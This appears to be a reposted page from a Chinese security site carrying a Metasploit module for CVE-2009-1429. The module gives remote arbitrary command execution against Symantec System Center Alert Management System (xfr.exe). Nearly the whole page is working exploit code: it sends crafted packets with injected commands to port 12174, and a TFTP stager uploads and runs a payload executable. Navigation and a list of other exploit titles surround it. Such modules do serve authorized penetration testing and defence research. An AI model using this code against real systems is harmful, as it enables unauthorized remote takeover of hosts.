首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execu
来源:http://www.metasploit.com 作者:MC 发布时间:2011-08-22  

##
# $Id: ams_xfr.rb 13591 2011-08-19 18:35:29Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

 Rank = ExcellentRanking

 include Msf::Exploit::CmdStagerTFTP
 include Msf::Exploit::Remote::Tcp

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',
   'Description'    => %q{
     Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
     because the application fails to properly sanitize user-supplied input.
   },
   'Author'         => [ 'MC' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 13591 $',
   'References'     =>
    [
     [ 'CVE', '2009-1429' ],
     [ 'BID', '34671' ],
     [ 'OSVDB', '54157' ],
     [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-060/' ],
     [ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]
    ],
   'Targets'       =>
    [
     [ 'Windows Universal',
      {
       'Arch' => ARCH_X86,
       'Platform' => 'win'
      }
     ]
    ],
   'Privileged' => 'true',
   'Platform' => 'win',
   'DefaultTarget' => 0,
   'DisclosureDate' => 'Apr 28 2009'))

  register_options(
   [
    Opt::RPORT(12174),
    OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
   ], self.class)
 end

 def windows_stager

  exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

  print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
  execute_cmdstager({ :temp => '.'})
  @payload_exe = payload_exe

  print_status("Attempting to execute the payload...")
  execute_command(@payload_exe)

 end

 def execute_command(cmd, opts = {})

  connect

   len  = 2 + cmd.length

   data =  [0x00000000].pack('V')
   data << len.chr
   data << "\x00"
   data << cmd + " "
   data << "\x00"

   sock.put(data)

   res = sock.get_once

    if (!res)
     print_error("Did not recieve data. Failed?")
    else
     print_status("Got data, execution successful!")
    end

  disconnect
  
 end

 def exploit

  if not datastore['CMD'].empty?
   print_status("Executing command '#{datastore['CMD']}'")
   execute_command(datastore['CMD'])
   return
  end

  case target['Platform']
   when 'win'
    windows_stager
   else
    raise RuntimeError, 'Target not supported.'
   end

  handler

 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Easy Printer Care XMLSimple
·Symantec System Center Alert M
·Apache httpd Remote Denial of
·XlightFTP Server v3.7.0 Remote
·Apache Struts < 2.2.0 Remote C
·iPhone Safari Remote Crash
·Solarftp v2.1.2 PASV buffer ov
·Zen Media Player (.pls) Local
·Opera Web Browser 11.50 DoS
·Contrexx Shopsystem Blind SQL
·IE for Windowse Mobile Denial
·Notepad++ NppFTP plugin LIST c
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved